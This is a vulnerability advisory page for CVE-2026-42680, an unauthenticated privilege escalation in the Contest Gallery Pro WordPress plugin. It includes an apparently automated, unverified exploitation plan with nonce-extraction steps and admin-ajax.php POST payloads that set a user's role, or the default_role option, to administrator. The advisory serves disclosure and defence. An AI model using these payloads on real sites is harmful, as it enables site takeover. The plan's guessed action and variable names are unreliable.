WP-Safety
CVE-2026-42680

Contest Gallery Pro <= 29.0.1 - Unauthenticated Privilege Escalation

criticalIncorrect Privilege Assignment
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
29.0.2
Patched in
3d
Time to patch

Description

The Contest Gallery Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 29.0.1. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=29.0.1
PublishedMay 17, 2026
Last updatedMay 19, 2026
Affected plugincontest-gallery-pro
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-42680 (Contest Gallery Pro) This plan outlines the methodology for identifying and exploiting the unauthenticated privilege escalation vulnerability in Contest Gallery Pro (<= 29.0.1). ## 1. Vulnerability Summary The vulnerability is an **Unauthenticated Priv…

Show full research plan

Exploitation Research Plan: CVE-2026-42680 (Contest Gallery Pro)

This plan outlines the methodology for identifying and exploiting the unauthenticated privilege escalation vulnerability in Contest Gallery Pro (<= 29.0.1).

1. Vulnerability Summary

The vulnerability is an Unauthenticated Privilege Escalation caused by Incorrect Privilege Assignment. It resides in a functionality—likely an AJAX or REST API handler—that allows a user to update user roles or metadata without sufficient authentication or capability checks. This allows an anonymous visitor to grant themselves (or a new account) the administrator role.

2. Attack Vector Analysis

  • Endpoint: Most likely wp-admin/admin-ajax.php (via wp_ajax_nopriv_* hooks) or a REST API endpoint registered via rest_api_init.
  • Authentication: None required (Unauthenticated).
  • Payload Parameter: Likely a parameter related to user roles (e.g., role, user_role, wp_capabilities) or a generic metadata update parameter.
  • Preconditions: The plugin must be active. A valid nonce may be required if the plugin implements CSRF protection but fails at authorization.

3. Code Flow (Inferred)

  1. An unauthenticated request is sent to admin-ajax.php with a specific action.
  2. WordPress executes the function hooked to wp_ajax_nopriv_[action].
  3. The handler function processes input from $_POST or $_REQUEST.
  4. The code lacks a current_user_can('manage_options') check.
  5. The code calls a sensitive function such as wp_update_user(), update_user_meta(), or wp_insert_user() using user-controlled parameters.
  6. The user's role is updated to administrator.

4. Nonce Acquisition Strategy

If the vulnerable endpoint requires a nonce, follow these steps to retrieve it:

  1. Identify the Script Localization: Search the plugin for wp_localize_script to find how nonces are passed to the frontend.
    • Search Command: grep -rn "wp_localize_script" /var/www/html/wp-content/plugins/contest-gallery-pro/
  2. Determine the Triggering Shortcode: Find where the script identified above is enqueued. It is likely tied to a shortcode like [contest-gallery] or [cg_user_registration].
    • Search Command: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/contest-gallery-pro/
  3. Create a Target Page:
    • wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content="[inferred_shortcode_here]"
  4. Extract the Nonce:
    • Navigate to the new page using browser_navigate.
    • Use browser_eval to extract the nonce. (Inferred variable names: window.cg_ajax_object?.nonce or window.contest_gallery_vars?.nonce).

5. Exploitation Strategy

The goal is to find an AJAX handler that modifies user data.

Step 1: Identify the Target Action

Search for unauthenticated AJAX handlers:
grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/contest-gallery-pro/

Look for actions like:

  • cg_save_user_data
  • contest_gallery_register_user
  • cg_update_profile

Step 2: Analyze the Handler

Examine the function identified. Look for calls to wp_update_user.
Example Vulnerable Pattern (Inferred):

function cg_vulnerable_handler() {
    $user_id = $_POST['user_id'];
    $role = $_POST['role']; // Attacker provides 'administrator'
    wp_update_user( array( 'ID' => $user_id, 'role' => $role ) );
    wp_die();
}

Step 3: Execute the Privilege Escalation

Using the http_request tool, send a POST request to admin-ajax.php.

Request Structure:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body (Example): action=[VULNERABLE_ACTION]&user_id=[TARGET_USER_ID]&role=administrator&nonce=[NONCE]

Note: If registration is the vector, the payload might involve wp_insert_user instead of wp_update_user.

6. Test Data Setup

  1. Install Plugin: Ensure contest-gallery-pro version 29.0.1 is installed.
  2. Create Low-Privilege User:
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password
  3. Identify ID: Get the ID of the 'attacker' user.
    • wp user get attacker --field=ID

7. Expected Results

  • Response: The server returns a success code (e.g., 200 OK or a JSON {"success":true}).
  • Database Change: The wp_capabilities entry in the wp_usermeta table for the target user ID is updated to include the administrator role.

8. Verification Steps

After sending the HTTP request, verify the escalation using WP-CLI:

  1. Check Role: wp user get attacker --field=roles
    • Success: Output is administrator.
  2. Check Capabilities: wp user list --role=administrator
    • Success: The user attacker appears in the list of administrators.

9. Alternative Approaches

  • Option Update: If no user-specific handler is found, check for an AJAX action that calls update_option. If an attacker can change the default_role option to administrator, any new user registration will result in an admin account.
    • Payload: action=[vulnerable_action]&option_name=default_role&option_value=administrator
  • REST API: Check wp-json/contest-gallery-pro/v1/... routes if AJAX handlers are not found. Use the same logic: look for permission callbacks that return true or are missing entirely.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Contest Gallery Pro plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 29.0.1. This occurs because the plugin exposes AJAX handlers for user management that lack proper capability checks, allowing anonymous attackers to elevate any user account to the 'administrator' role.

Exploit Outline

1. Identify an unauthenticated AJAX handler registered via the wp_ajax_nopriv_ hook that performs user account updates (e.g., actions related to user registration or profile editing). 2. Visit a public page on the target site containing a plugin shortcode (like [contest-gallery]) to extract a valid security nonce from the localized JavaScript variables (e.g., cg_ajax_object.nonce). 3. Submit a POST request to /wp-admin/admin-ajax.php with the vulnerable 'action' parameter, the acquired nonce, and a parameter setting the target 'role' to 'administrator'. 4. Confirm the privilege escalation by checking the user's role in the WordPress administrative interface or via WP-CLI.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/b8b443bb-4b23-48a1-9859-953b3cd84ca6?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database